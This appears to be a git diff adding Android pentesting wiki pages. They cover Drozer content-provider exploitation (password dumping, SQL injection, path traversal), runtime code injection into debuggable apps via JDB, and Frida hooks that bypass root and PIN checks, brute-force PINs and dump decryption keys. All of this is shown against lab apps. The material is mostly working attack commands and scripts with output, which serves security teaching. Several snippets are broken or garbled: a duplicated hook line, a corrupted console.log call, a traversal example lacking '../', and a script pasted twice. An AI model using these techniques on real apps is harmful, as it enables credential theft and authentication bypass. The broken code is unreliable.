+* [http://mobiletools.mwrinfosecurity.com/Using-Drozer-for-application-security-assessments/](http://mobiletools.mwrinfosecurity.com/Using-Drozer-for-application-security-assessments/)
+
+## More info
+
+* [https://blog.dixitaditya.com/android-pentesting-cheatsheet/](https://blog.dixitaditya.com/android-pentesting-cheatsheet/)
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
new file mode 100644
index 00000000..41ea0167
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
@@ -0,0 +1,197 @@
+# Exploiting Content Providers
+
+## Intro
+
+A content provider component **supplies data from one application to others** on request. Such requests are handled by the methods of the ContentResolver class. A content provider can use different ways to store its data and the data can be **stored** in a **database**, in **files**, or even over a **network**.
+
+It has to be declared inside the _Manifest.xml_ file. Example:
+
+```markup
+<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
+    <path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
+</provider>
+```
+
+In this case, it's necessary the permission `READ_KEYS` to access `content://com.mwr.example.sieve.DBContentProvider/Keys`  
+\(_Also, notice that in the next section we are going to access `/Keys/` which isn't protected, that's because the developer got confused and protected `/Keys` but declared `/Keys/`_\)
+
+**Maybe you can access private data or exploit some vulnerability \(SQL Injection or Path Traversal\).**
+
+## Get info from **exposed content providers**
+
+```text
+dz> run app.provider.info -a com.mwr.example.sieve 
+  Package: com.mwr.example.sieve
+  Authority: com.mwr.example.sieve.DBContentProvider
+  Read Permission: null
+  Write Permission: null
+  Content Provider: com.mwr.example.sieve.DBContentProvider
+  Multiprocess Allowed: True
+  Grant Uri Permissions: False
+  Path Permissions:
+  Path: /Keys
+  Type: PATTERN_LITERAL
+  Read Permission: com.mwr.example.sieve.READ_KEYS
+  Write Permission: com.mwr.example.sieve.WRITE_KEYS
+  Authority: com.mwr.example.sieve.FileBackupProvider
+  Read Permission: null
+  Write Permission: null
+  Content Provider: com.mwr.example.sieve.FileBackupProvider
+  Multiprocess Allowed: True
+  Grant Uri Permissions: False
+```
+
+We can **reconstruct** part of the content **URIs** to access the **DBContentProvider**, because we know that they must begin with “_content://_” and the information obtained by Drozer inside Path: _/Keys_.
+
+Drozer can **guess and try several URIs**:
+
+```text
+dz> run scanner.provider.finduris -a com.mwr.example.sieve 
+Scanning com.mwr.example.sieve...
+Unable to Query content://com.mwr.example.sieve.DBContentProvider/
+... 
+Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys 
+Accessible content URIs:
+content://com.mwr.example.sieve.DBContentProvider/Keys/
+content://com.mwr.example.sieve.DBContentProvider/Passwords
+content://com.mwr.example.sieve.DBContentProvider/Passwords/
+```
+
+You should also check the **ContentProvider code** to search for queries: 
+
+![](../../../.gitbook/assets/image%20%28152%29.png)
+
+Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
+
+![](../../../.gitbook/assets/image%20%28229%29.png)
+
+The query will be like: `content://name.of.package.class/declared_name`
+
+## **Database-backed Content Providers**
+
+Probably most of the Content Providers are used as **interface** for a **database**. Therefore, if you can access it you could be able to **extract, update, insert and delete** information.   
+Check if you can **access sensitive information** or try to change it to **bypass authorisation** mechanisms.
+
+When checking the code of the Content Provider **look** also for **functions** named like: _query, insert, update and delete_:
+
+![](../../../.gitbook/assets/image%20%28211%29.png)
+
+![](../../../.gitbook/assets/image%20%28254%29.png)
+
+Because you will be able to call them
+
+### Query content
+
+```text
+dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
+_id: 1
+service: Email
+username: incognitoguy50
+password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
+-
+email: incognitoguy50@gmail.com
+```
+
+### Insert content
+
+Quering the database you will learn the **name of the columns**, then, you could be able to insert data in the DB:
+
+![](../../../.gitbook/assets/image%20%2834%29.png)
+
+![](../../../.gitbook/assets/image%20%28156%29.png)
+
+_Note that in insert and update you can use --string to indicate string, --double to indicate a double, --float, --integer, --long, --short, --boolean_
+
+### Update content
+
+Knowing the name of the columns you could also **modify the entries**:
+
+![](../../../.gitbook/assets/image%20%28163%29.png)
+
+### Delete content
+
+![](../../../.gitbook/assets/image%20%2864%29.png)
+
+### **SQL Injection**
+
+It is simple to test for SQL injection **\(SQLite\)** by manipulating the **projection** and **selection fields** that are passed to the content provider.  
+When quering the Content Provider there are 2 interesting arguments to search for information: _--selection_ and _--projection_:
+
+![](../../../.gitbook/assets/image%20%28279%29.png)
+
+You can try to **abuse** this **parameters** to test for **SQL injections**:
+
+```text
+dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'" 
+unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
+```
+
+```text
+dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* 
+FROM SQLITE_MASTER WHERE type='table';--" 
+| type  | name             | tbl_name         | rootpage | sql              |
+| table | android_metadata | android_metadata | 3        | CREATE TABLE ... | 
+| table | Passwords        | Passwords        | 4        | CREATE TABLE ... |
+```
+
+#### Automatic SQLInjection discovery by Drozer
+
+```text
+dz> run scanner.provider.injection -a com.mwr.example.sieve 
+Scanning com.mwr.example.sieve... 
+Injection in Projection:
+  content://com.mwr.example.sieve.DBContentProvider/Keys/
+  content://com.mwr.example.sieve.DBContentProvider/Passwords
+  content://com.mwr.example.sieve.DBContentProvider/Passwords/
+Injection in Selection:
+  content://com.mwr.example.sieve.DBContentProvider/Keys/
+  content://com.mwr.example.sieve.DBContentProvider/Passwords
+  content://com.mwr.example.sieve.DBContentProvider/Passwords/
+  
+dz> run scanner.provider.sqltables -a jakhar.aseem.diva
+Scanning jakhar.aseem.diva...
+Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
+  android_metadata
+  notes
+  sqlite_sequence
+```
+
+## **File System-backed Content Providers**
+
+Content providers could be also used to **access files:**
+
+![](../../../.gitbook/assets/image%20%28297%29.png)
+
+### Read **file**
+
+You can read files from the Content Provider
+
+```text
+dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 
+127.0.0.1            localhost
+```
+
+### **Path Traversal**
+
+If you can access files, you can try to abuse a Path Traversal \(in this case this isn't necessary but you can try to use "_../_" and similar tricks\). 
+
+```text
+dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 
+127.0.0.1            localhost
+```
+
+#### **Automatic Path Traversal discovery by Drozer**
+
+```text
+dz> run scanner.provider.traversal -a com.mwr.example.sieve 
+Scanning com.mwr.example.sieve... 
+Vulnerable Providers:
+  content://com.mwr.example.sieve.FileBackupProvider/
+  content://com.mwr.example.sieve.FileBackupProvider
+```
+
+## References
+
+* [https://www.tutorialspoint.com/android/android\_content\_providers.htm](https://www.tutorialspoint.com/android/android_content_providers.htm)
+* [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/)
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
new file mode 100644
index 00000000..87de004c
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
@@ -0,0 +1,210 @@
+# Exploiting a debuggeable applciation
+
+**Information copied from** [**https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/\#article**](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article)\*\*\*\*
+
+In the previous article, we have seen how to debug Java applications using a little tool called JDB. In this article, we will apply the same logic to exploit Android apps, if they are flagged as debuggable. If an application is flagged as debuggable, we can inject our own code to execute it in the context of the vulnerable application process.
+
+**Background**
+
+To make this article more interesting, I have developed a vulnerable application for demonstration purposes, which has a “**button**” and a “**textview**“.
+
+Fill out the form below to download the code associated with this article.
+
+INFOSEC FILE DOWNLOAD
+
+If we launch the application, it shows the message “**Crack Me**“.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack1.png)
+
+Figure 1
+
+If we click the button, it says “**Try Again**“. Now, our goal is to change the message “Try Again” to “Hacked” without modifying the application’s source code. To be precise, we have to change it at runtime.
+
+**Required Tools**
+
+* Emulator
+* adb – Android Debug Bridge
+* jdb – Java Debugger
+
+  In my case, to make the installations easier, I am using Android Tamer since all the above required tools are pre-installed.
+
+  **Topics Involved**
+
+  * Checking for Vulnerability.
+  * Getting Ready with the Setup.
+  * Runtime Code Injection.
+
+  Let’s begin the game.
+
+  **Checking for Vulnerability**
+
+  In fact, this is the easiest part of the entire article.
+
+  1. Decompile the application using APKTOOL to get the AndroidManifest.xml file using the following command.
+
+  apktool d &lt;vulnerableapp&gt;.apk
+
+  2. Inspect Androidmanifest.xml file for the following line.
+
+  android:debuggable=”true”
+
+  If you find the above line in the AndroidManifest.xml file, the application is debuggable and it can be exploited.
+
+  **Note:** We used APKTOOL to see whether the app is debuggable or not. We won’t touch or modify any piece of code as mentioned earlier.
+
+  **Getting Ready with the Setup**
+
+  In this step, we will set up all the required things to inject code in to the app during its execution. As mentioned in the previous article, we will use remote debugging in this article.
+
+1. Start Your Emulator
+2. Install the vulnerable application
+3. Open up your terminal and run the following command to see the Dalvik VM ports listening on the emulator.
+
+   _**adb jdwp**_
+
+   The above command displays all the ports on which we can connect and debug as shown below.
+
+   ![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack2.png)
+
+   Figure 2
+
+   **Note:** JDWP stands for Java Debug Wire Protocol. If an application running in its VM is debuggable, it exposes a unique port on which we can connect to it using JDB. This is possible in Dalvik Virtual Machines with the support of JDWP.
+
+4. Now, launch our target application and run the same command to see the listening port associated with our target application. It looks as shown below.
+
+   ![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack3.png)
+
+   Figure 2
+
+   If we observe the difference between Figure 2 and Figure 3, there is one extra port 543 listening after launching the target application in Figure 3. We will attach JDB to the application using this port, since this is our target.
+
+5. Before attaching to the application, we need to port forward using adb since we are using remote debugging. This is shown in Figure 4.
+
+   ![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack4.png)
+
+   Figure 4
+
+6. Now, let’s attach JDB to the application as shown in the following figure.
+
+   ![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack5.png)
+
+   Figure 5
+
+**Runtime Code Injection**
+
+In this step, we will actually exploit the vulnerable application by modifying its behavior at runtime.
+
+To modify the application’s behavior at runtime, we need to set up breakpoints and control the flow. But, we don’t know what classes and methods are used in the application. So, let’s use the following commands to find out the classes and methods used in the application.
+
+To find the classes: “**classes**”
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack6.png)
+
+Figure 6.1
+
+Since I have too many classes listed, I am listing only a few classes. But if you still scroll down, you will see some interesting user defined classes as shown in the figure below.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack7.png)
+
+Figure 6.2
+
+Now, let us see the methods associated with MainActivity$1 class using the following command.
+
+“_**methods com.example.debug.MainActivity$1**_”
+
+This is shown in figure 7.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack8.png)
+
+Figure 7
+
+Now, let’s set up a breakpoint at onClick method and control the execution of the app as shown in Figure 8.
+
+_**“stop in com.example.debug.MainActivity$1.onClick\(android.view.View\)”**_
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack9.png)
+
+Figure 8
+
+To hit the breakpoint, we will have to manually click the button in the application. Once after clicking the button, the breakpoint will be hit and it appears as shown in Figure 9.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack10.png)
+
+Figure 9
+
+From here onwards, we will be able to control and see the sensitive values, method arguments, etc. using various commands.
+
+Just to understand what’s happening in the background, I am following the code associated with the onClick method, which is shown in Figure 10.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack11.png)
+
+Figure 10
+
+Before proceeding further, let’s see if there are any local variables at this point in time using the command “**locals**“.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack12.png)
+
+Figure 11
+
+As we can see, there is no interesting information for us.
+
+So, let’s execute the next line using the “**next**” command as shown below.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack13.png)
+
+Figure 12
+
+Let’s again try executing the command “**locals**” to see what happened in the previous command.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack14.png)
+
+Figure 13
+
+It’s pretty clear that TextView has been loaded into method arguments. If we look at the source code provided in Figure 10, the line associated with TextView instantiation has been executed.
+
+Let’s now execute the next lines by executing the “**next**” command, and check the local variables as shown in the figure below.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack15.png)
+
+Figure 14
+
+As we can see, all the local variables have been displayed. The string “**secret**” looks interesting. The value “Try Again” is what is going to be printed when we click the button.
+
+From Figure 10, it is very clear that the method **setText** is getting executed to print the value “**Try Again**“. So, let’s use the “**step**” command to get into the definition of the “**setText**” method and dynamically modify the text to be printed.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack16.png)
+
+Figure 15
+
+Let’s see the local variables inside the definition using “**locals**“.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack17.png)
+
+Figure 16
+
+Now, let’s change the value of “**text**” from “**Try Again**” to “**Hacked**” using “**set**” command.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack18.png)
+
+Figure 17
+
+We cannot see any changes in the application, since we haven’t executed the modified code.
+
+So, let’s run the application using the “**run**” command as shown below, and see the application’s output on its screen.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack19.png)
+
+Figure 18
+
+Let’s look at the application running in the emulator.
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/052314_1204_AndroidHack20.png)
+
+Figure 19
+
+We have successfully modified the output of the application at runtime. This is just an example to show how an application’s behavior can be modified if the application is debuggable. We can perform various other things including “**Getting a shell**” on the device in the context of the vulnerable application.
+
+**Conclusion**
+
+In this article, we have demonstrated how one can exploit an Android application if it is left debuggable when moving it to the production. Pentesters should always look for this vulnerability during their Android app pentests.
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md
new file mode 100644
index 00000000..560e250a
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md
@@ -0,0 +1,190 @@
+# Frida Tutorial
+
+## Installation
+
+Install **frida tools**:
+
+```text
+pip install frida-tools
+pip install frida
+```
+
+**Download and install** in the android the **frida server** \([Download the latest release](https://github.com/frida/frida/releases)\).   
+One-liner to restart adb in root mode, connect to it, upload frida-server, give exec permissions and run it in backgroud:
+
+```text
+adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &" 
+```
+
+**Check** if it is **working**:
+
+```text
+frida-ps -U #List packages and processes
+frida-ps -U | grep -i <part_of_the_package_name> #Get all the package name
+```
+
+## Tutorials
+
+### [Tutorial 1](frida-tutorial-1.md)
+
+**From**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)  
+**APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)  
+**Source Code**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
+
+Follow the [link to read it](frida-tutorial-1.md).
+
+### [Tutorial 2](frida-tutorial-2.md)
+
+**From**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) \(Parts 2, 3 & 4\)  
+**APKs and Source code**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
+
+Follow the[ link to read it.](frida-tutorial-2.md)
+
+### [Tutorial 3](owaspuncrackable-1.md)
+
+**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)  
+**APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk)
+
+Follow the [link to read it](owaspuncrackable-1.md).  
+**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re/)\*\*\*\*
+
+## Fast Examples
+
+Here you can find the more basic and interesting functionalities of Frida to make a quick script:
+
+### Calling Frida from command line
+
+```bash
+frida-ps -U
+
+#Basic frida hooking
+frida -l disableRoot.js -f owasp.mstg.uncrackable1
+
+#Hooking before starting the app
+frida -U --no-pause -l disableRoot.js -f owasp.mstg.uncrackable1
+#The --no-pause and -f options allow the app to be spawned automatically,
+#frozen so that the instrumentation can occur, and the automatically
+#continue execution with our modified code.
+```
+
+### Basic Python Script
+
+```python
+import frida, sys
+
+jscode = open(sys.argv[0]).read()
+process = frida.get_usb_device().attach('infosecadventures.fridademo')
+script = process.create_script(jscode)
+print('[ * ] Running Frida Demo application')
+script.load()
+sys.stdin.read()
+```
+
+### Hooking functions without parameters
+
+Hook the function `a()` of the class `sg.vantagepoint.a.c`
+
+```javascript
+Java.perform(function () {
+;  rootcheck1.a.overload().implementation = function() {
+  rootcheck1.a.overload().implementation = function() {
+    send("sg.vantagepoint.a.c.a()Z   Root check 1 HIT!  su.exists()");
+    return false;
+  };
+});
+```
+
+Hook java `exit()`
+
+```javascript
+var sysexit = Java.use("java.lang.System");
+  sysexit.exit.overload("int").implementation = function(var_0) {
+    send("java.lang.System.exit(I)V  // We avoid exiting the application  :)");
+  };
+```
+
+Hook MainActivity `.onStart()` & `.onCreate()`
+
+```javascript
+var mainactivity = Java.use("sg.vantagepoint.uncrackable1.MainActivity");
+  mainactivity.onStart.overload().implementation = function() {
+    send("MainActivity.onStart() HIT!!!");
+    var ret = this.onStart.overload().call(this);
+  };
+  mainactivity.onCreate.overload("android.os.Bundle").implementation = function(var_0) {
+    send("MainActivity.onCreate() HIT!!!");
+    var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0);
+  };
+```
+
+Hook android `.onCreate()`
+
+```javascript
+  var activity = Java.use("android.app.Activity");
+  activity.onCreate.overload("android.os.Bundle").implementation = function(var_0) {
+    send("Activity HIT!!!");
+    var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0);
+  };
+```
+
+### Hooking functions with parameters and retrieving the value
+
+ Hooking a decryption function. Print the input, call the original function decrypt the input and finally, print the plain data:
+
+```javascript
+  function getString(data){
+      var ret = "";
+      for (var i=0; i < data.length; i++){
+          ret += data[i].toString();
+        }
+      return ret
+    } 
+  var aes_decrypt = Java.use("sg.vantagepoint.a.a");
+  aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) {
+    send("sg.vantagepoint.a.a.a([B[B)[B   doFinal(enc)  // AES/ECB/PKCS7Padding");
+    send("Key       : " + getString(var_0));
+    send("Encrypted : " + getString(var_1));
+    var ret = this.a.overload("[B","[B").call(this,var_0,var_1);
+    send("Decrypted : " + ret);
+
+    var flag = "";
+    for (var i=0; i < ret.length; i++){
+      flag += String.fromCharCode(ret[i]);
+    }
+    send("Decrypted flag: " + flag);
+    return ret; //[B
+  };
+```
+
+### Hooking functions and calling them with our input
+
+Hook a function that receives a string and call it with other string \(from [here](https://11x256.github.io/Frida-hooking-android-part-2/)\)
+
+```javascript
+var string_class = Java.use("java.lang.String"); // get a JS wrapper for java's String class
+
+my_class.fun.overload("java.lang.String").implementation = function(x){ //hooking the new function
+  var my_string = string_class.$new("My TeSt String#####"); //creating a new String by using `new` operator 
+  console.log("Original arg: " +x );
+  var ret =  this.fun(my_string); // calling the original function with the new String, and putting its return value in ret variable
+  console.log("Return value: "+ret);
+  return ret;
+};
+```
+
+### Getting an already created object of a class
+
+If you want to extract some attribute of a created object you can use this.
+
+In this example you are going to see how to get the object of the class my\_activity and how to call the function .secret\(\) that will print a private attribute of the object:
+
+```javascript
+Java.choose("com.example.a11x256.frida_test.my_activity" , {
+  onMatch : function(instance){ //This function will be called for every instance found by frida
+    console.log("Found instance: "+instance);
+    console.log("Result of secret func: " + instance.secret());
+  },
+  onComplete:function(){}
+});
+```
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
new file mode 100644
index 00000000..c63d00a0
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
@@ -0,0 +1,131 @@
+# Frida Tutorial 1
+
+**From**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)  
+**APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)  
+**Source Code**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
+
+## Python
+
+Frida allows you to **insert JavaScript code** inside functions of a running application. But you can use **python** to **call** the hooks and even to **interact** with the **hooks**.
+
+This is a easy python script that you can use with all the proposed examples in this tutorial:
+
+```python
+#hooking.py
+import frida, sys
+
+with open(sys.argv[1], 'r') as f:
+        jscode = f.read()
+process = frida.get_usb_device().attach('infosecadventures.fridademo')
+script = process.create_script(jscode)
+print('[ * ] Running Frida Demo application')
+script.load()
+sys.stdin.read()
+```
+
+Call the script:
+
+```bash
+python hooking.py <hookN.js>
+```
+
+It is useful to know how to use python with frida, but for this examples you could also call directly Frida using command line frida tools:
+
+```text
+frida -U --no-pause -l hookN.js -f infosecadventures.fridademo
+```
+
+## Hook 1 - Boolean Bypass
+
+Here you can see how to **hook** a **boolean** method \(_checkPin_\) from the class: _infosecadventures.fridademo.utils.PinUtil_
+
+```javascript
+//hook1.js
+Java.perform(function() {
+ console.log("[ * ] Starting implementation override...")
+ var MainActivity = Java.use("infosecadventures.fridademo.utils.PinUtil");
+ MainActivity.checkPin.implementation = function(pin){
+     console.log("[ + ] PIN check successfully bypassed!")
+     return true;
+ }
+});
+```
+
+```text
+python hooking.py hook1.js
+```
+
+Mirar: La funcion recibe como parametro un String, no hace falta overload?
+
+## Hook 2 - Function Bruteforce
+
+### Non-Static Function
+
+If you want to call a non-static function of a class, you **first need a instance** of that class. Then, you can use that instance to call the function.  
+To do so, you could **find and existing instance** and use it:
+
+```javascript
+Java.perform(function() {
+ console.log("[ * ] Starting PIN Brute-force, please wait...");
+ Java.choose("infosecadventures.fridademo.utils.PinUtil", {
+  onMatch: function(instance) {
+   console.log("[ * ] Instance found in memory: " + instance);
+   for(var i = 1000; i < 9999; i++){
+    if(instance.checkPin(i + "") == true){
+     console.log("[ + ] Found correct PIN: " + i);
+     break;
+    }
+   }
+  },
+  onComplete: function() { }
+ });
+});
+```
+
+In this case this is not working as there isn't any instance and the function is Static
+
+### Static Function
+
+If the function is static, you could just call it:
+
+```javascript
+//hook2.js
+Java.perform(function () {
+    console.log("[ * ] Starting PIN Brute-force, please wait...")
+    var PinUtil = Java.use("infosecadventures.fridademo.utils.PinUtil");
+ 
+    for(var i=1000; i < 9999; i++)
+    {
+        if(PinUtil.checkPin(i+"") == true){
+            console.log("[ + ] Found correct PIN: " + i);
+        }
+    }
+});
+```
+
+## Hook 3 - Retrieving arguments and return value
+
+You could hook a function and make it **print** the value of the **passed arguments** and the value of the **return value:**
+
+```javascript
+//hook3.js
+Java.perform(function() {
+ console.log("[ * ] Starting implementation override...")
+  
+ var EncryptionUtil = Java.use("infosecadventures.fridademo.utils.EncryptionUtil");
+ EncryptionUtil.encrypt.implementation = function(key, value){
+     console.log("Key: " + key);
+     console.log("Value: " + value);
+     var encrypted_ret = this.encrypt(key, value); //Call the original function
+     console.log("Encrypted value: " + encrypted_ret);
+     return encrypted_ret;
+ }
+});
+```
+
+## Important
+
+In this tutorial you have hooked methods using the name of the mathod and _.implementation_. But if there were **more than one method** with the same name, you will need to **specify the method** that you want to hook **indicating the type of the arguments**.
+
+You can see that in [the next tutorial](frida-tutorial-2.md).
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md
new file mode 100644
index 00000000..d7cdd98f
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md
@@ -0,0 +1,253 @@
+# Frida Tutorial 2
+
+**From**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) \(Parts 2, 3 & 4\)  
+**APKs and Source code**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
+
+The part 1 is so easy.
+
+**Some parts of the original code doesn't work and have been modified here.**
+
+## Part 2
+
+Here you can see an example of how to **hook 2 functions with the same name** but different parameters.  
+Also, you are going to learn how to **call a function with your own parameters**.  
+And finally, there is an example of how to **find an instance of a class and make it call a function**.
+
+```javascript
+//s2.js
+console.log("Script loaded successfully ");
+Java.perform(function x() {
+    console.log("Inside java perform function");
+    var my_class = Java.use("com.example.a11x256.frida_test.my_activity");
+    //Hook "fun" with parameters (int, int)
+    my_class.fun.overload("int", "int").implementation = function (x, y) { //hooking the old function
+        console.log("original call: fun(" + x + ", " + y + ")");
+        var ret_value = this.fun(2, 5);
+        return ret_value;
+    };
+    //Hook "fun" with paramater(String)
+    var string_class = Java.use("java.lang.String");
+    my_class.fun.overload("java.lang.String").implementation = function (x) { //hooking the new function
+        console.log("*************************************")
+        //Create a new String and call the function with your input.
+        var my_string = string_class.$new("My TeSt String#####");
+        console.log("Original arg: " + x);
+        var ret = this.fun(my_string);
+        console.log("Return value: " + ret);
+        console.log("*************************************")
+        return ret;
+    };
+    //Find an instance of the class and call "secret" function.
+    Java.choose("com.example.a11x256.frida_test.my_activity", {
+        onMatch: function (instance) {
+            console.log(tring, and the it has"Found instance: " + instance);
+            console.log("Result of secret func: " + instance.secret());
+        },
+        onComplete: function () { }
+    });
+});
+```
+
+You can see that to create a String first is has referenced the class _java.lang.String_ and then it has created a _$new_ object of that class with a String as content. This is the correct way to create a new object of a class. But, in this case, you could just pass to `this.fun()` any String like: `this.fun("hey there!")`
+
+### Python
+
+```python
+//loader.py
+import frida
+import time
+
+device = frida.get_usb_device()
+pid = device.spawn(["com.example.a11x256.frida_test"])
+device.resume(pid)
+time.sleep(1) #Without it Java.perform silently fails
+session = device.attach(pid)
+script = session.create_script(open("s2.js").read())
+script.load()
+
+#prevent the python script from terminating
+raw_input()
+```
+
+```text
+python loader.py
+```
+
+## Part 3
+
+### Python
+
+Now you are going to see how to send commands to the hooked app via Python to call function:
+
+```python
+//loader.py
+import time
+import frida
+
+def my_message_handler(message, payload):
+    print message
+    print payload
+
+
+device = frida.get_usb_device()
+pid = device.spawn(["com.example.a11x256.frida_test"])
+device.resume(pid)
+time.sleep(1)  # Without it Java.perform silently fails
+session = device.attach(pid)
+with open("s3.js") as f:
+    script = session.create_script(f.read())
+script.on("message", my_message_handler)
+script.load()
+
+command = ""
+while 1 == 1:
+    command = raw_input("Enter command:\n1: Exit\n2: Call secret function\n3: Hook Secret\nchoice:")
+    if command == "1":
+        break
+    elif command == "2":
+        script.exports.callsecretfunction()
+    elif command == "3":
+        script.exports.hooksecretfunction()
+```
+
+The command "**1**" will **exit**, the command "**2**" will find and **instance of the class and call the private function** _**secret\(\)**_ and command "**3**" will **hook** the function _**secret\(\)**_ so it **return** a **different string**.
+
+The, if you call "**2**" you will get the **real secret**, but if you call "**3**" and then "**2**" you will get the **fake secret**.
+
+### JS
+
+```javascript
+console.log("Script loaded successfully ");
+var instances_array = [];
+function callSecretFun() {
+    Java.perform(function () {
+        if (instances_array.length == 0) { // if array is empty
+            Java.choose("com.example.a11x256.frida_test.my_activity", {
+                onMatch: function (instance) {
+                    console.log("Found instance: " + instance);
+                    instances_array.push(instance)
+                    console.log("Result of secret func: " + instance.secret());
+                },
+                onComplete: function () { }
+
+            });
+        }
+        else {//else if the array has some values
+            console.log("Result of secret func: " + instances_array[0].secret());
+        }
+
+    });
+}
+
+function hookSecret() {
+    Java.perform(function () {
+        var my_class = Java.use("com.example.a11x256.frida_test.my_activity");
+        var string_class = Java.use("java.lang.String");
+        my_class.secret.overload().implementation = function(){
+            var my_string = string_class.$new("TE ENGANNNNEEE");
+            return my_string;
+        }
+    });
+}
+rpc.exports = {
+    callsecretfunction: callSecretFun,
+    hooksecretfunction: hookSecret
+};console.log("Script loaded successfully ");
+var instances_array = [];
+function callSecretFun() {
+    Java.perform(function () {
+        if (instances_array.length == 0) { // if array is empty
+            Java.choose("com.example.a11x256.frida_test.my_activity", {
+                onMatch: function (instance) {
+                    console.log("Found instance: " + instance);
+                    instances_array.push(instance)
+                    console.log("Result of secret func: " + instance.secret());
+                },
